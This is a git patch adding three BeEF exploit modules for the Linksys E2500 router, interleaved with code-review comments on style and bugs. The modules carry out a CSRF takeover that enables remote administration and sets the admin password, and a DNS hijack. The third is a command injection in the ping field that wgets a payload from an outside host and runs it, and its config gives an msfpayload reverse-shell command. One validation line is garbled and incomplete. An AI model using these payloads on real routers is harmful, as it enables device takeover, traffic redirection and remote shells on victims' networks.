From 4852f0d8619c29e740cdf285ce7fc7744d2e8a9e Mon Sep 17 00:00:00 2001 From: n00py Date: Wed, 16 Sep 2015 01:57:23 -0700 Subject: [PATCH] linksyse2500 --- .../router/linksys_e2500_csrf/command.js | 47 ++++++++++++++ .../router/linksys_e2500_csrf/config.yaml | 15 +++++ .../router/linksys_e2500_csrf/module.rb | 20 ++++++ .../linksys_e2500_dns_hijack/command.js | 64 +++++++++++++++++++ .../linksys_e2500_dns_hijack/config.yaml | 15 +++++ .../router/linksys_e2500_dns_hijack/module.rb | 19 ++++++ .../router/linksys_e2500_shell/command.js | 46 +++++++++++++ .../router/linksys_e2500_shell/config.yaml | 15 +++++ .../router/linksys_e2500_shell/module.rb | 19 ++++++ 9 files changed, 260 insertions(+) create mode 100644 modules/exploits/router/linksys_e2500_csrf/command.js create mode 100644 modules/exploits/router/linksys_e2500_csrf/config.yaml create mode 100644 modules/exploits/router/linksys_e2500_csrf/module.rb create mode 100644 modules/exploits/router/linksys_e2500_dns_hijack/command.js create mode 100644 modules/exploits/router/linksys_e2500_dns_hijack/config.yaml create mode 100644 modules/exploits/router/linksys_e2500_dns_hijack/module.rb create mode 100644 modules/exploits/router/linksys_e2500_shell/command.js create mode 100644 modules/exploits/router/linksys_e2500_shell/config.yaml create mode 100644 modules/exploits/router/linksys_e2500_shell/module.rb
diff --git a/modules/exploits/router/linksys_e2500_csrf/command.js b/modules/exploits/router/linksys_e2500_csrf/command.js
new file mode 100644
index 000000000..5fd779dce
--- /dev/null
+++ b/modules/exploits/router/linksys_e2500_csrf/command.js
@@ -0,0 +1,47 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var port = '<%= @port %>';
+ var gateway = '<%= @base %>';
+ var passwd = '<%= @password %>';
+ var timeout = 15;
+
+ var e2500_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", "application/x-www-form-urlencoded",
+ [{'type':'hidden', 'name':'submit_button', 'value':'Management'} ,
+ {'type':'hidden', 'name':'change_action', 'value':''},
+ {'type':'hidden', 'name':'action', 'value':'Apply'},
+ {'type':'hidden', 'name':'PasswdModify', 'value':'1'},
+ {'type':'hidden', 'name':'http_enable', 'value':'1'},
+ {'type':'hidden', 'name':'https_enable', 'value':'0'},
+ {'type':'hidden', 'name':'ctm404_enable', 'value':''},
+ {'type':'hidden', 'name':'remote_mgt_https', 'value':'1'},
+ {'type':'hidden', 'name':'wait_time', 'value':'4'},
+ {'type':'hidden', 'name':'need_reboot', 'value':'0'},
+ {'type':'hidden', 'name':'http_passwd', 'value':passwd},
+ {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd},
+ {'type':'hidden', 'name':'_http_enable', 'value':'1'},
+ {'type':'hidden', 'name':'_https_enable', 'value':'0'},
+ {'type':'hidden', 'name':'web_wl_filter', 'value':'0'},
+ {'type':'hidden', 'name':'remote_management', 'value':'1'},
+ {'type':'hidden', 'name':'_remote_mgt_https', 'value':'0'},
+ {'type':'hidden', 'name':'remote_upgrade', 'value':'1'},
+ {'type':'hidden', 'name':'remote_ip_any', 'value':'1'},
+ {'type':'hidden', 'name':'http_wanport', 'value':port},
+ {'type':'hidden', 'name':'nf_alg_sip', 'value':'0'},
+ {'type':'hidden', 'name':'upnp_enable', 'value':'1'},
+ {'type':'hidden', 'name':'upnp_config', 'value':'1'},
+ {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'}
+ ]);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(e2500_iframe_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/router/linksys_e2500_csrf/config.yaml b/modules/exploits/router/linksys_e2500_csrf/config.yaml
new file mode 100644
index 000000000..d073bb2b5
--- /dev/null
+++ b/modules/exploits/router/linksys_e2500_csrf/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ linksys_e2500_csrf:
+ enable: true
+ category: ["Exploits", "Router"]
+ name: "Linksys E2500 CSRF"
+ description: "Attempts to enable remote administration and change the password on a Linksys E2500 router."
+ authors: ["Esteban Rodriguez"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/router/linksys_e2500_csrf/module.rb b/modules/exploits/router/linksys_e2500_csrf/module.rb
new file mode 100644
index 000000000..03a6a9bc7
--- /dev/null
+++ b/modules/exploits/router/linksys_e2500_csrf/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Linksys_e2500_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
+ {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'},
+ {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/router/linksys_e2500_dns_hijack/command.js b/modules/exploits/router/linksys_e2500_dns_hijack/command.js
new file mode 100644
index 000000000..d6de3d95a
--- /dev/null
+++ b/modules/exploits/router/linksys_e2500_dns_hijack/command.js
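Review bot: `cleanup = function() {` near the end of the linksys_e2500_csrf command.js hunk assigns an undeclared identifier, so it becomes a global on the hooked page, and `setTimeout("cleanup()", timeout*1000)` two lines later resolves that global by evaluating a string when the timer fires. If the module is run a second time inside the 15-second window, the second assignment replaces the first, the first timer then removes the second iframe, the second timer's `removeChild` throws because that node is already gone, and the first iframe is never removed. Declaring it locally and passing the reference, `var cleanup = function() { … };` and `setTimeout(cleanup, timeout*1000);`, binds each timer to the iframe its own closure holds. The same pattern appears in the linksys_e2500_dns_hijack and linksys_e2500_shell command.js hunks.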
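Review bot: `return [` in `self.options` of the linksys_e2500_csrf module.rb hunk is an explicit return of the method's final expression, and `save({'result' => @datastore['result']})` wraps a hash argument in braces it does not need; the idiomatic form is the bare array literal as the last expression and `save('result' => @datastore['result'])`. The three modules in this patch also name the router address differently: here and in linksys_e2500_shell the option is `base`, a full URL ending in `/` that command.js concatenates with `apply.cgi`, while linksys_e2500_dns_hijack takes `rhost` as a bare host and hard-codes `http://` in its template, so one convention across the set would keep the operator-facing options consistent. Both points apply equally to the linksys_e2500_dns_hijack and linksys_e2500_shell module.rb hunks.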
@@ -0,0 +1,64 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ // config
+ var target = 'http://<%= @rhost %>/apply.cgi';
+ var dns1 = '<%= @dns1 %>';
+ var timeout = 15;
+
+ // validate primary DNS server IP address
+ var parts = dns1.split('.');
+ if (parts.length != 4) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
+ return;
+ }
+ for (var i=0; i 255) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
+ return;
+ }
+ }
+
+ // change DNS
+ var linksys_e2500_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", "application/x-www-form-urlencoded", [
+ {'type':'hidden', 'name':'submit_button', 'value': 'index'},
+ {'type':'hidden', 'name':'change_action', 'value': ''},
+ {'type':'hidden', 'name':'submit_type', 'value': ''},
+ {'type':'hidden', 'name':'action', 'value': 'Apply'},
+ {'type':'hidden', 'name':'wan_dns', 'value': '4'},
+ {'type':'hidden', 'name':'wan_dns0_0', 'value': parts[0]},
+ {'type':'hidden', 'name':'wan_dns0_1', 'value': parts[1]},
+ {'type':'hidden', 'name':'wan_dns0_2', 'value': parts[2]},
+ {'type':'hidden', 'name':'wan_dns0_3', 'value': parts[3]},
+ {'type':'hidden', 'name':'wan_dns1_0', 'value': '0'},
+ {'type':'hidden', 'name':'wan_dns1_1', 'value': '0'},
+ {'type':'hidden', 'name':'wan_dns1_2', 'value': '0'},
+ {'type':'hidden', 'name':'wan_dns1_3', 'value': '0'},
+ {'type':'hidden', 'name':'wan_dns2_0', 'value': '0'},
+ {'type':'hidden', 'name':'wan_dns2_1', 'value': '0'},
+ {'type':'hidden', 'name':'wan_dns2_2', 'value': '0'},
+ {'type':'hidden', 'name':'wan_dns2_3', 'value': '0'},
+ {'type':'hidden', 'name':'wan_wins', 'value': '4'},
+ {'type':'hidden', 'name':'wan_wins_0', 'value': '0'},
+ {'type':'hidden', 'name':'wan_wins_1', 'value': '0'},
+ {'type':'hidden', 'name':'wan_wins_2', 'value': '0'},
+ {'type':'hidden', 'name':'wan_wins_3', 'value': '0'},
+
+ ]);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ // clean up
+ cleanup = function() {
+ document.body.removeChild(linksys_e2500_iframe_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/router/linksys_e2500_dns_hijack/config.yaml b/modules/exploits/router/linksys_e2500_dns_hijack/config.yaml
new file mode 100644
index 000000000..a35db71c8
--- /dev/null
+++ b/modules/exploits/router/linksys_e2500_dns_hijack/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ linksys_e2500_dns_hijack:
+ enable: true
+ category: ["Exploits", "Router"]
+ name: "Linksys E2500 DNS Hijack"
+ description: "Attempts to change the DNS setting on a Linksys E2500 router."
+ authors: ["Esteban Rodriguez"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/router/linksys_e2500_dns_hijack/module.rb b/modules/exploits/router/linksys_e2500_dns_hijack/module.rb
new file mode 100644
index 000000000..fdc30a18e
--- /dev/null
+++ b/modules/exploits/router/linksys_e2500_dns_hijack/module.rb
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Linksys_e2500_dns_hijack < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1'},
+ {'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8'},
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
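Review bot: the validation loop in the middle of the linksys_e2500_dns_hijack command.js hunk reads `for (var i=0; i 255) {` as shown — the loop bound, the increment and the `if` header that should sit between `i` and `255` are absent, which looks like an HTML-stripped `<`…`>` span in the page rendering rather than the committed text, but it means the octet check cannot be reviewed here and should be confirmed against the repository. Whatever the exact condition, a numeric comparison against 255 does not reject an empty or non-numeric octet (`'' > 255` and `'abc' > 255` are both false), so `parts.length != 4` plus that check still passes malformed input through to the form fields. The `dns1` value is also dropped into a single-quoted JavaScript literal by `var dns1 = '<%= @dns1 %>';` with no escaping, so an operator value containing a quote breaks the script instead of reaching the validation at all; a format check on the Ruby side of the option, or escaping at the template, would keep that failure explicit.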
diff --git a/modules/exploits/router/linksys_e2500_shell/command.js b/modules/exploits/router/linksys_e2500_shell/command.js
new file mode 100644
index 000000000..5189de68d
--- /dev/null
+++ b/modules/exploits/router/linksys_e2500_shell/command.js
@@ -0,0 +1,46 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var base = '<%= @base %>';
+ var payload = '<%= @payload %>';
+ var random = Math.random().toString(36).substring(7);
+ var timeout = 15;
+
+
+ var e2500_iframe_2<%= @command_id %> = beef.dom.createIframeXsrfForm(base + "apply.cgi", "POST", "application/x-www-form-urlencoded",
+ [{'type':'hidden', 'name':'submit_button', 'value':'Diagnostics'} ,
+ {'type':'hidden', 'name':'change_action', 'value':'gozila_cgi'},
+ {'type':'hidden', 'name':'submit_type', 'value':'start_ping'},
+ {'type':'hidden', 'name':'action', 'value':''},
+ {'type':'hidden', 'name':'commit', 'value':'0'},
+ {'type':'hidden', 'name':'ping_ip', 'value':'192.168.1.1'},
+ {'type':'hidden', 'name':'ping_size', 'value':'&/tmp/' + random +'&'},
+ {'type':'hidden', 'name':'ping_times', 'value':'5'},
+ {'type':'hidden', 'name':'traceroute_ip', 'value':''},
+ ]);
+
+ var e2500_iframe_1<%= @command_id %> = beef.dom.createIframeXsrfForm(base + "apply.cgi", "POST", "application/x-www-form-urlencoded",
+ [{'type':'hidden', 'name':'submit_button', 'value':'Diagnostics'} ,
+ {'type':'hidden', 'name':'change_action', 'value':'gozila_cgi'},
+ {'type':'hidden', 'name':'submit_type', 'value':'start_ping'},
+ {'type':'hidden', 'name':'action', 'value':''},
+ {'type':'hidden', 'name':'commit', 'value':'0'},
+ {'type':'hidden', 'name':'ping_ip', 'value':'192.168.1.1'},
+ {'type':'hidden', 'name':'ping_size', 'value':'&/usr/bin/wget ' + payload + ' -O /tmp/' + random + ';chmod 777 /tmp/' + random + '&'},
+ {'type':'hidden', 'name':'ping_times', 'value':'5'},
+ {'type':'hidden', 'name':'traceroute_ip', 'value':''},
+ ]);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(e2500_iframe_1<%= @command_id %>);
+ document.body.removeChild(e2500_iframe_2<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/router/linksys_e2500_shell/config.yaml b/modules/exploits/router/linksys_e2500_shell/config.yaml
new file mode 100644
index 000000000..4138e0a30
--- /dev/null
+++ b/modules/exploits/router/linksys_e2500_shell/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ linksys_e2500_shell:
+ enable: true
+ category: ["Exploits", "Router"]
+ name: "Linksys E2500 Shell"
+ description: "Attempts to exploit a command execution vulnerability on a Linksys E2500 router. It will wget a binary payload to the temp directory, change permissions, and run the binary. Command to generate payload: msfpayload linux/mipsle/shell_reverse_tcp LHOST=[Attacker IP] X > reverse"
+ authors: ["Esteban Rodriguez"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/router/linksys_e2500_shell/module.rb b/modules/exploits/router/linksys_e2500_shell/module.rb
new file mode 100644
index 000000000..22076bb1a
--- /dev/null
+++ b/modules/exploits/router/linksys_e2500_shell/module.rb
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Linksys_e2500_shell < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
+ {'name' => 'payload', 'ui_label' => 'Path to exploit payload', 'value' => 'http://192.0.2.2/payload'},
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end